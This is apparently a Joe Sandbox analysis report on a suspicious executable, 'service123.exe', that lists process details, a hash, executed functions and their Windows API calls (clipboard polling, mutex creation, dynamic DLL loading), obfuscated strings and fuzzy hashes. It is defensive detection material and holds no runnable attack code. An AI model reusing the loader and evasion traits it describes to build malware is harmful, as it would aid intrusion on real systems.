Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0xac0000
File size:	314'617'856 bytes
MD5 hash:	A91E6E8067DCF42DF58AFD7304BC3D32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:19:03
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0xac0000
File size:	314'617'856 bytes
MD5 hash:	A91E6E8067DCF42DF58AFD7304BC3D32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.6%
Total number of Nodes:	117
Total number of Limit Nodes:	6

Executed Functions

Function 6C2B14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2B14CD
_exit.MSVCRT ref: 6C2B151A
_write.MSVCRT ref: 6C2B156A
_close.MSVCRT ref: 6C2B1579

Strings

,p=l, xrefs: 6C384AED
CONOUT$, xrefs: 6C2B14C6
terminated, xrefs: 6C2B1540
@, xrefs: 6C384AB1

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,p=l$@$CONOUT$
API String ID: 28676597-3876384797
Opcode ID: e980433f5370ede7c95fee257b4d325003f0efb69266708bce07fab2a50c46c9
Instruction ID: a26517ab6cca2d95f38c4f942396bfd2f76beed709fe89366d5bd19da55d62a4
Opcode Fuzzy Hash: e980433f5370ede7c95fee257b4d325003f0efb69266708bce07fab2a50c46c9
Instruction Fuzzy Hash: 4A413CB1A093099FDB00DF79C44465EBBF8AF49358F008A2DE8A5E7640E735D544CF56

Function 00AC116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00AC11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00AC1238
__p__acmdln.MSVCRT ref: 00AC1261
malloc.MSVCRT ref: 00AC12EB
strlen.MSVCRT ref: 00AC1323
malloc.MSVCRT ref: 00AC132E
memcpy.MSVCRT ref: 00AC1344
GetStartupInfoA.KERNEL32 ref: 00AC1433

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: ae730bdd31981e37f2373067fb52187ffda9dc9f4289f7f352ab991cbce1ddf6
Instruction ID: 36f1597cf487f99686bfff23bfa6e8895a83b9eb4102f5ec69238de9729dffd3
Opcode Fuzzy Hash: ae730bdd31981e37f2373067fb52187ffda9dc9f4289f7f352ab991cbce1ddf6
Instruction Fuzzy Hash: CC816DB5A042008FDB10DFA8D984FA9BBF1FB46304F07453CD9869B312D7759846CB82

Function 00AC15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00AC15CD
_exit.MSVCRT ref: 00AC161A
_write.MSVCRT ref: 00AC166A
_close.MSVCRT ref: 00AC1679

Strings

CONOUT$, xrefs: 00AC15C6
@, xrefs: 00AC8341
terminated, xrefs: 00AC1640

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 91b232ba357e5e6e09223fc08796e1a7831e4fb6aeaa09c1781ff21dc0f97cca
Instruction ID: d70f53487200d40a4be413a54e41fdf9c4d775b36f3bf66836e8dc317cf0a03b
Opcode Fuzzy Hash: 91b232ba357e5e6e09223fc08796e1a7831e4fb6aeaa09c1781ff21dc0f97cca
Instruction Fuzzy Hash: B44126B09042058FDB00EFB9C944B6EBBF4BB84314F068A2DE899D7351EB78D845CB52

Function 6C2C9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C2C9EB0: GetClipboardSequenceNumber.USER32 ref: 6C2C9EBE

Sleep.KERNELBASE ref: 6C2C9BFF
GetClipboardSequenceNumber.USER32 ref: 6C2C9C08

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: 330612f81da1e07e9d82ee937f12c07ed4a16a1564d08e6b91f084c972c77d2c
Instruction ID: 6dbbc1ed7da5128851dbdb0b9511851a84d2c363674a451eb0dc5ad411c49c11
Opcode Fuzzy Hash: 330612f81da1e07e9d82ee937f12c07ed4a16a1564d08e6b91f084c972c77d2c
Instruction Fuzzy Hash: 824106B060830A8ECB40FF74C1985AEBBF4AF55309F414A2DE89697640EB34E51DCB93

Function 00AC81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00AC138E,?,?,00006EA2,00AC138E), ref: 00AC8271
GetProcAddress.KERNEL32 ref: 00AC828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,00AC138E,?,?,00006EA2,00AC138E), ref: 00AC829D

Strings

Failed to get function address. Error code: %d, xrefs: 00AC82E0
PIkBSUFyyUbeWPelaYLm, xrefs: 00AC827E
vinthoOIUgUISlONgUISlONHmyI.dll, xrefs: 00AC824A

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$PIkBSUFyyUbeWPelaYLm$vinthoOIUgUISlONgUISlONHmyI.dll
API String ID: 145871493-2754287522
Opcode ID: 4b65af7496a97f101c07a210548c15a16c97f43e06c822ba5625be47598b2030
Instruction ID: 786c624862e9370af39b467a539d5fdc4095495af436c8e279c8933b7488bbf7
Opcode Fuzzy Hash: 4b65af7496a97f101c07a210548c15a16c97f43e06c822ba5625be47598b2030
Instruction Fuzzy Hash: 7F3181719056009FD700EFB8DE49E9ABBF4FB55340F03492CE55593200EE79D546CB52

Function 00AC8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,00AC138E,?,?,00006EA2,00AC138E), ref: 00AC8271
GetProcAddress.KERNEL32 ref: 00AC828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,00AC138E,?,?,00006EA2,00AC138E), ref: 00AC829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00AC138E,?,?,00006EA2,00AC138E), ref: 00AC82BD
GetLastError.KERNEL32 ref: 00AC82DA
FreeLibrary.KERNEL32 ref: 00AC82F3

Strings

PIkBSUFyyUbeWPelaYLm, xrefs: 00AC827E
Failed to load DLL. Error code: %d, xrefs: 00AC82C3
vinthoOIUgUISlONgUISlONHmyI.dll, xrefs: 00AC824A

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$PIkBSUFyyUbeWPelaYLm$vinthoOIUgUISlONgUISlONHmyI.dll
API String ID: 1397630947-3534762621
Opcode ID: cd70576bceb27f8cda0ed5f98b4e2e0cddeb0cdfca7549363ce136cc4ffdbfdf
Instruction ID: 47b4bd720c21ce4a86b622c11101497508361dbf863051a9f13b00d7f24041c8
Opcode Fuzzy Hash: cd70576bceb27f8cda0ed5f98b4e2e0cddeb0cdfca7549363ce136cc4ffdbfdf
Instruction Fuzzy Hash: 1D11E2729046049FD700EFB4DE09EAE7BE0FB55344F02862CD46687151EF76D512CA82

Function 00AC13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00AC1238
__p__acmdln.MSVCRT ref: 00AC1261
malloc.MSVCRT ref: 00AC12EB
strlen.MSVCRT ref: 00AC1323
malloc.MSVCRT ref: 00AC132E
memcpy.MSVCRT ref: 00AC1344
_amsg_exit.MSVCRT ref: 00AC13EA
_initterm.MSVCRT ref: 00AC140C

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 444764dca08c070fe84be60dfd6776be3904a1c8e3828bbe3f573bb59b524112
Instruction ID: 401babcd71778d66a4bad008662ae0ea0da2bd96b1fc3c6d4f2f716ad2afef5a
Opcode Fuzzy Hash: 444764dca08c070fe84be60dfd6776be3904a1c8e3828bbe3f573bb59b524112
Instruction Fuzzy Hash: 2B41E5B5A043018FDB10EFA8E984B5DBBF1BB45304F16492DD9869B312DB74A846CF92

Function 00AC11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00AC11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00AC1238
__p__acmdln.MSVCRT ref: 00AC1261
malloc.MSVCRT ref: 00AC12EB
strlen.MSVCRT ref: 00AC1323
malloc.MSVCRT ref: 00AC132E
memcpy.MSVCRT ref: 00AC1344
_amsg_exit.MSVCRT ref: 00AC13EA
_initterm.MSVCRT ref: 00AC140C

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 6698fba5a5123d84099533afaafa5db6ced7ea35cd9589d5ec15d2b1a737c825
Instruction ID: 5b1d963cfd436c37e9088f53e815a3d4065491a71fcd5d9de9f68e3abb49cac5
Opcode Fuzzy Hash: 6698fba5a5123d84099533afaafa5db6ced7ea35cd9589d5ec15d2b1a737c825
Instruction Fuzzy Hash: 274107B4A043018FDB10EFA8E984F5EBBF0BB45344F16452DD9869B352DB74A846CF92

Function 00AC1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00AC11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00AC1238
__p__acmdln.MSVCRT ref: 00AC1261
malloc.MSVCRT ref: 00AC12EB
strlen.MSVCRT ref: 00AC1323
malloc.MSVCRT ref: 00AC132E
memcpy.MSVCRT ref: 00AC1344
GetStartupInfoA.KERNEL32 ref: 00AC1433

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: baff002c90736cfa0552bee52371b89cce40bdf8dd029782148685e4bc6bcb1b
Instruction ID: 87afd0f19240494703b06e6910fcd65351e992323606dd14a2f85018de8fbecc
Opcode Fuzzy Hash: baff002c90736cfa0552bee52371b89cce40bdf8dd029782148685e4bc6bcb1b
Instruction Fuzzy Hash: B95127B5A043008FDB14DFA8E984F5ABBF0FB49304F16852DD9469B312DB74A846CB91

Function 6C2C9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C2C9B99
CreateMutexA.KERNELBASE ref: 6C2C9BE3
Sleep.KERNELBASE ref: 6C2C9BFF
GetClipboardSequenceNumber.USER32 ref: 6C2C9C08

Strings

PmKvPAZEGlrvJpkkTgct, xrefs: 6C2C9B82, 6C2C9BCC

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: PmKvPAZEGlrvJpkkTgct
API String ID: 3689039344-1271558439
Opcode ID: 0895d78640c9d169254c1b4b1617380f47805cc35777f0c9a53700f0afc3ce64
Instruction ID: 3ee0d1b5c8b910baa308d869826c61687d9166c2c63f0cfab201be151f25b48e
Opcode Fuzzy Hash: 0895d78640c9d169254c1b4b1617380f47805cc35777f0c9a53700f0afc3ce64
Instruction Fuzzy Hash: F201D27560930A9FCB00FF78C54975BBFF8AB46349F018918E88993640EB74A159CF93

Function 00AC1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00AC12EB
strlen.MSVCRT ref: 00AC1323
malloc.MSVCRT ref: 00AC132E
memcpy.MSVCRT ref: 00AC1344

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 2cbe23feefa2f8dc1221e406b0f19eaee6044aa1e66222742c91ef54d683e0f0
Instruction ID: fbd7d6b59f9f855d250e4a9ab0d26f20e1b16d4121c58cc9e4496ae7d93d0867
Opcode Fuzzy Hash: 2cbe23feefa2f8dc1221e406b0f19eaee6044aa1e66222742c91ef54d683e0f0
Instruction Fuzzy Hash: A13109B5A04715CFDB10DFA8D980B99B7F1FB49300F16852DD94AAB312D735A906CF81

Function 00AC13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00AC12EB
strlen.MSVCRT ref: 00AC1323
malloc.MSVCRT ref: 00AC132E
memcpy.MSVCRT ref: 00AC1344

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 511d523c6717423cff1e619960076fcf233eca2be9d405dc24c144c0068b573e
Instruction ID: e63fc96ea8bc823d412563bdcdd5bd105f99e3c066e5d6c36b6d4016fb765410
Opcode Fuzzy Hash: 511d523c6717423cff1e619960076fcf233eca2be9d405dc24c144c0068b573e
Instruction Fuzzy Hash: E421D3B5A05715CFCB14DFA8D980A99B7F1FB89300F12892DD94AA7311D734A906CF81

Function 6C2CB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae914c0953bbf1dc335d1c7aa30ccf315f83fbfd7678dafffe14f0fbf6f2da2
Instruction ID: 0871be6f82b966597760179a9d76409a48c240499ebe83db70ac5f0c55f5d0be
Opcode Fuzzy Hash: dae914c0953bbf1dc335d1c7aa30ccf315f83fbfd7678dafffe14f0fbf6f2da2
Instruction Fuzzy Hash: 3B514FB5B0620BCFDB04DF19D08095ABBF4FF86358B544659D9589BB11E730E8448FA3

Function 6C2CB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5fb80350ddf01398793a8d5e2bb2145840ae6dce4415b2891e76a17ce07a9d4
Instruction ID: c85df7c61a37fc851dd26cbdc952d37fe5cdcf4c89af1e8ea90088587a4f76cc
Opcode Fuzzy Hash: d5fb80350ddf01398793a8d5e2bb2145840ae6dce4415b2891e76a17ce07a9d4
Instruction Fuzzy Hash: 6031D1B17062068FEB049F68C5C0A467BB8FF86398B984269DE108FB45EB30D4058B63

Non-executed Functions

Function 6C2BCD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BCD7D

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1842bcdbe90678ff740ef27f8ebfc50f0234134fe0b82cfb01a1c33f888fd1e0
Instruction ID: d70ba91b27405de43a941bfb0beb3fa74e051a16f3de6cd1a38aac17f6284f31
Opcode Fuzzy Hash: 1842bcdbe90678ff740ef27f8ebfc50f0234134fe0b82cfb01a1c33f888fd1e0
Instruction Fuzzy Hash: 2B0239715087568FD700CF28C044795FBE2AF4635CF0986AEECE867796C776A449CB41

Function 6C2C0FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2C0FCA
strlen.MSVCRT ref: 6C2C0FD4

Strings

5, xrefs: 6C2C14D2
inity, xrefs: 6C2C1E21
!, xrefs: 6C2C2C08
, xrefs: 6C2C240F

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: a148a607366eb80afdf7c987902a1718f2ec499557be2b48c4fe85d31aae3cee
Instruction ID: cd78303dc38e9a562f7685901f91c922a859f3b21fdd1e492b413db2bebeb9e4
Opcode Fuzzy Hash: a148a607366eb80afdf7c987902a1718f2ec499557be2b48c4fe85d31aae3cee
Instruction Fuzzy Hash: 46F237B5A087898FD760CF29C48475ABBE0BF89348F118A1DE8D997750DB75E884CB43

Function 6C3384D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Auth, xrefs: 6C3385E7
Genu, xrefs: 6C33866E
rdrand, xrefs: 6C3385A8
rdseed, xrefs: 6C338518
hardware, xrefs: 6C3386A0
Auth, xrefs: 6C33854F
rand_s, xrefs: 6C3386B7
default, xrefs: 6C3384EF
random_device::random_device(const std::string&): device not available, xrefs: 6C338598
random_device::random_device(const std::string&): unsupported token, xrefs: 6C3386D2
rdrnd, xrefs: 6C338618
Auth, xrefs: 6C338676
Genu, xrefs: 6C338557
Genu, xrefs: 6C3385DF

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
